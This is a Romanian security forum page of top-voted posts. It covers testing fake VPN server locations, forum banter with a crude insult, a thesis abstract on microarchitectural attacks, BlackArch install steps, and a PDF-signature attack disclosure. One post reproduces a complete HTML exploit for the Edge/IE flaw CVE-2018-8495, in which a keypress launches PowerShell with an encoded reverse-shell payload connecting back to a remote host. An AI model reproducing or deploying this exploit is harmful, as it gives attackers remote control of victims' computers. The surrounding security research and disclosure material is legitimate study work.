The ping results will continuously populate in the chart. Once again, the results clearly show this server is in Singapore. No doubt about it. Now we can see beyond all doubt, this VPN server is located in Singapore, not Nepal. Controlling for variables With every fake server location I found, all three tools strongly suggested the same location. Nonetheless, you may still get some outlier results due to different variables and hops in the network. To control for variables and easily eliminate these outliers, simply run multiple tests with all three tools. You should find the results to be very consistent, all pointing to the same location. Conclusion on fake VPN server locations Dishonesty is a growing problem with VPNs that more people are starting to recognize. From fake reviews to shady marketing tactics, false advertising, and various VPN scams, there’s a lot to watch out for. Fake VPN servers are yet another issue to avoid. Unfortunately with all the deceptive marketing, it can be difficult to find the true facts. Most VPNs emphasize the size of their server network rather than server quality. This quantity over quality trend is obvious with most of the larger VPN providers. On the opposite end of the spectrum are smaller VPN services that have fewer locations, but prioritize the quality of their server network, such as Perfect Privacy and VPN.ac. Some VPN users may not care about fake servers. Nonetheless, fake VPN servers can be problematic if you: are trying to avoid specific countries are trying to optimize VPN performance (which may be affected by longer distances) are trying to access restricted content (fake locations may still be blocked) expect the server to be where the VPN says it is (honesty) With the tools and information in this article, you can easily verify the location of any VPN server, which removes the guesswork completely. Appendix (testing results) ExpressVPN Nepal (Singapore) URL: nepal-ca-version-2.expressnetw.com And now running a traceroute to the “Nepal” server from Singapore: This “Nepal” server is located in Singapore. ExpressVPN Bhutan (Singapore) URL: bhutan-ca-version-2.expressnetw.com And now running a traceroute to the “Bhutan” server from Singapore: Once again, ExpressVPN’s “Bhutan” server is located in Singapore. ExpressVPN Sri Lanka (Singapore) URL: srilanka-ca-version-2.expressnetw.com Here’s the traceroute to the “Sri Lanka” server from Singapore: The “Sri Lanka” server is actually in Singapore. ExpressVPN Bangladesh (Singapore) URL: bangladesh-ca-version-2.expressnetw.com Here’s the traceroute to the “Bangladesh” server from Singapore: It is easy to see that the “Bangladesh” server is located in Singapore, especially when you compare the locations using the ping test. ExpressVPN Myanmar (Singapore) URL: myanmar-ca-version-2.expressnetw.com Here’s the traceroute to the “Myanmar” server from Singapore: This VPN server is located in Singapore (also verified by the other tests). ExpressVPN Laos (Singapore) URL: laos-ca-version-2.expressnetw.com Here’s the traceroute to the “Laos” server from Singapore: This server is also clearly in Singapore. ExpressVPN Brunei (Singapore) URL: brunei-ca-version-2.expressnetw.com Here’s the traceroute to the “Brunei” server from Singapore: Once again, this is clearly in Singapore. But given the close geographic proximity of these locations, I also checked ping times from neighboring countries, such as Malaysia and Indonesia, which were all significantly higher than the ping time from Singapore. All tests pointed to the same conclusion: Singapore. ExpressVPN Philippines (Singapore) URL: ph-via-sing-ca-version-2.expressnetw.com Unlike all of the other fictitious server locations, ExpressVPN appears to be admitting the true location with the configuration file name. Below you see that the config file is named “Philippines (via Singapore)” – which suggests the true location. Here’s the traceroute to the “Philippines” server from Singapore: Just like with all the other traceroute tests, this location is also in Singapore. ExpressVPN Macau (Singapore) URL: macau-ca-version-2.expressnetw.com This was another server location that was very easy to identify as fake using the ping test. Because Hong Kong and Macau are right next to each other, the closest ping result should have been with the Hong Kong server. But instead, Hong Kong’s ping time was about 32 milliseconds and Singapore’s ping time was again around 2 milliseconds. Here is the traceroute to “Macau” from Singapore: Another fake server location, which is clearly in Singapore. ExpressVPN Indonesia (Singapore) URL: indonesia-ca-version-2.expressnetw.com The ping test with this location was another dead giveaway. The ping result from Jakarta, Indonesia was 198 milliseconds, and the ping result from Singapore was under 2 milliseconds. Again, case closed. Here is the traceroute from Singapore: Location: Singapore. PureVPN Aruba (Los Angeles, USA) URL: aw1-ovpn-udp.pointtoserver.com All tests show this server is located in Los Angeles, California (USA). Here is the traceroute from Los Angeles: Actual server location: Los Angeles, California PureVPN Bahrain (Amsterdam, Netherlands) URL: bh-ovpn-udp.pointtoserver.com Here is the traceroute from Amsterdam. This “Bahrain” server is undoubtedly in Amsterdam. PureVPN Saudi Arabia (Los Angeles, USA) URL: sa1-ovpn-udp.pointtoserver.com Now running the traceroute from Los Angeles, California: This “Saudi Arabia” server is in Los Angeles. PureVPN Yemen (Frankfurt, Germany) URL: ym1-ovpn-udp.pointtoserver.com Here’s the traceroute from Frankfurt: PureVPN’s “Yeman” server is clearly in Frankfurt, Germany. UPDATES HideMyAss (November 2017) – As a response, HideMyAss has told us, “We have always been open and transparent about virtual server locations and believe that the concept is explained comprehensively both on our website and in our latest software client.” However, when you examine their server locations page, it is still not clear exactly which locations are “virtual”. ExpressVPN – ExpressVPN has fully updated their server locations page to explain exactly which servers are real and which are “virtual”. They have also removed all contradictory claims about “no logs” and clarified their exact policies. You can check out the details on the ExpressVPN website here. PureVPN – We have not heard anything form PureVPN since this article was first published. However, we did recently learn that PureVPN has been providing connection logs to the FBI while still claiming to have a “zero log policy”. Sursa: https://restoreprivacy.com/vpn-server-locations/
  31. 2 points
    Lista cu programatori buni care au avut mentor:
  32. 2 points
    Macar cineva isi da interesul ca tu sa ai acel torent, in zday, cum se spune, "la botul calului". Daca nu iti convine, poti oricand tu sa creezi altceva competitiv.
  33. 2 points
    Sau ne trezim cu topic-uri de genul "Cine ma ajuta sa sparg filelist", "Cine stie sa faca rost de cont", etc...
  34. 2 points
    La pariu ca vor aparea unii care vor cere invitatii aici, fix mai jos de acest post.
  35. 2 points
    Ar trebui pusa pinned unde cer aia invitatii, sa nu se mai oboseasca
  36. 2 points
    Ofer 3 gauri de covrigi si-o placere mamei tale Sau invers, o placere mamei tale, si dupaia 4 gauri de covrigi
  37. 2 points
    RST nu e serviciu de escrow. Cumpara pe propriul risc.
  38. 2 points
    Alt exemplu , intr-un context diferit. Nu ca as fi nationalist, dar researcher-ul e roman si a raportat tipul asta de vulnerabilitate inaintea lu' Hussain.
  39. 2 points
    CVE-2018-8639-exp platform: windows 2008 and windows 2008 R2 Sursa: https://github.com/ze0r/CVE-2018-8639-exp/
  40. 2 points
    Daniel Gruss Software-based Microarchitectural Attacks PhD Thesis Assessors: Stefan Mangard, Thorsten Holz June 2017 Modern processors are highly optimized systems where every single cycle ofcomputation time matters. Many optimizations depend on the data that isbeing processed. Software-based microarchitectural attacks exploit effectsof these optimizations. Microarchitectural side-channel attacks leak secretsfrom cryptographic computations, from general purpose computations, orfrom the kernel. This leakage even persists across all common isolationboundaries, such as processes, containers, and virtual machines.Microarchitectural fault attacks exploit the physical imperfections ofmodern computer systems. Shrinking process technology introduces effectsbetween isolated hardware elements that can be exploited by attackers totake control of the entire system. These attacks are especially interestingin scenarios where the attacker is unprivileged or even sandboxed.In this thesis, we focus on microarchitectural attacks and defenses oncommodity systems. We investigate known and new side channels andshow that microarchitectural attacks can be fully automated. Further-more, we show that these attacks can be mounted in highly restrictedenvironments such as sandboxed JavaScript code in websites. We showthat microarchitectural attacks exist on any modern computer system,including mobile devices (e.g., smartphones), personal computers, andcommercial cloud systems.This thesis consists of two parts. In the first part, we provide backgroundon modern processor architectures and discuss state-of-the-art attacksand defenses in the area of microarchitectural side-channel attacks andmicroarchitectural fault attacks. In the second part, a selection of ourpapers are provided without modification from their original publications.1I have co-authored these papers, which have subsequently been anony-mously peer-reviewed, accepted, and presented at renowned internationalconferences Download: https://gruss.cc/files/phd_thesis.pdf
  41. 2 points
    In anul 2019 si voi tot dupa nologine si root-uri.
  42. 2 points
    Blackarch https://www.blackarch.org Use https://sdrausty.github.io/TermuxArch/setupTermuxArch.shto install, update and configure Arch Linux on device first. Then edit your /etc/pacman.conf by adding: [blackarch] Server = http://blackarch.org/blackarch/$repo/os/$arch Next run pacman -Syu to update your repository listing. Then to install either distribution, run one of these commands: pacman -S blackarch --needed There are 1602 members in group blackarch: ~5G download (~16G on device) That's a lot of pentesting. If you don't desire this much pentesting, don't install everything that will be available. The recommended minimum free space allotment for this install is approximately 1G of free space in userspace, not on external SD. Enjoy 😀 More Information https://sdrausty.github.io/TermuxArch/ Sursa: https://wiki.termux.com/wiki/Blackarch
  43. 2 points
    Ce inseamna aplicatie multimedia? Si la ce pret te-ai gandit?
  44. 2 points
    Bai frate..ce ai tu cu mine? Doar ca sunt nou pe forum sunt mai prejos sau cum? Imi trebuie pentru o firma. Cred ca mai bine te-ai duce Tu la muncă și nu mai sta pe forumuri
  45. 2 points
    How to break PDF Signatures If you open a PDF document and your viewer displays a panel (like you see below) indicating that the document is signed by invoicing@amazon.de and the document has not been modified since the signature was applied You assume that the displayed content is precisely what invoicing@amazon.de has created. During recent research, we found out that this is not the case for almost all PDF Desktop Viewers and most Online Validation Services. So what is the problem? With our attacks, we can use an existing signed document (e.g., amazon.de invoice) and change the content of the document arbitrarily without invalidating the signatures. Thus, we can forge a document signed by invoicing@amazon.de to refund us one trillion dollars. To detect the attack, you would need to be able to read and understand the PDF format in depth. Most people are probably not capable of such thing (PDF file example). To recap this, you can use any signed PDF document and create a document which contains arbitrary content in the name of the signing user, company, ministry or state. Important: To verify the signature you need to trust the amazon.de certificate, which you would if you get signed PDFs from Amazon, otherwise the signature is still valid, but the certificate is not trusted. Furthermore, due to our responsible disclosure process, most applications already implemented countermeasure against our attack, you can find a vulnerable Adobe Acrobat DC Reader version here. Who uses PDF Signatures? Since 2014, organizations delivering public digital services in an EU member state are required to support digitally signed documents such as PDF files by law (eIDAS). In Austria, every governmental authority digitally signs any document §19. Also, any new law is legally valid after its announcement within a digitally signed PDF. Several countries like Brazil, Canada, the Russian Federation, and Japan also use and accept digitally signed documents. The US government protects PDF files with PDF signatures, and individuals can report tax withholdings by signing and submitting a PDF. Outside Europe, Forbes calls the electronic signature and digital transactions company DocuSign as No. 4 in its Cloud 100 list. Many companies sign every document they deliver (e.g., Amazon, Decathlon, Sixt). Standardization documents, such as ISO and DIN, are also protecting by PDF signatures. Even in the academic world, PDF signatures are sometimes used to sign scientific papers (e.g., ESORICS proceedings). According to Adobe Sign, the company processed 8 billion electronic and digital signatures in 2017 alone. Currently, we are not aware of any exploits using our attacks. How bad is it? We evaluated our attacks against two types of applications. The commonly known desktop applications everyone uses on a daily bases and online validation services. The last one is often used in the business world to validate the signature of a PDF document returning a validation report as a result. During our research, we identified 21 out of 22 desktop viewer applications and 5 out of 7 online validation services vulnerable against at least one of our attacks. You can find the detailed results of our evaluation on the following web pages: Desktop Viewer Applications Online Validation Services How can I protect myself? As part of our research, we started a responsible disclosure procedure on 9th October 2018, after we identified 21 out 22 desktop viewer applications and 5 out of 7 online validation services vulnerable against at least one of our attacks. In cooperation with the BSI-CERT, we contacted all vendors, provided proof-of-concept exploits, and helped them to fix the issues. You can take a look at which PDF Reader you are using and compare the versions. If you use one of our analyzed Desktop Viewer Applications you already should have got an update for you Reader. My PDF Reader is not listed If you use another Reader, you should contact the support team for your application. Continue reading Sursa: https://www.pdf-insecurity.org/
  46. 2 points
    in principiu, ceva iti mananca resursele, iar kernelul iti opreste din servicii ( serverul web, mysql etc ). indicat ar fi sa stai cu htop-ul pe el in momentele alea sa vezi ce anume iti consuma resursele atat de mult.
  47. 2 points
    <!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> </head> <body> <b>Windows Edge/IE 11 - RCE (CVE-2018-8495)</b> </br></br> <!-- adapt payload since this one connectback on an internal IP address (just a private VM nothing else sorry ;) ) --> <a id="q" href='wshfile:test/../../system32/SyncAppvPublishingServer.vbs" test test;powershell -nop -executionpolicy bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADUANgAuADEAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAg AD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEA ZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4 AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMA dAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0 AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;"'>Exploit-it now !</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script> </body> </html> Sursa: https://github.com/kmkz/exploit/blob/master/CVE-2018-8495.html
  48. 2 points
    When is a vulnerability actually a vulnerability? I can't answer this question easily, and thus we look at a few examples in this video.
×
×
  • Create New...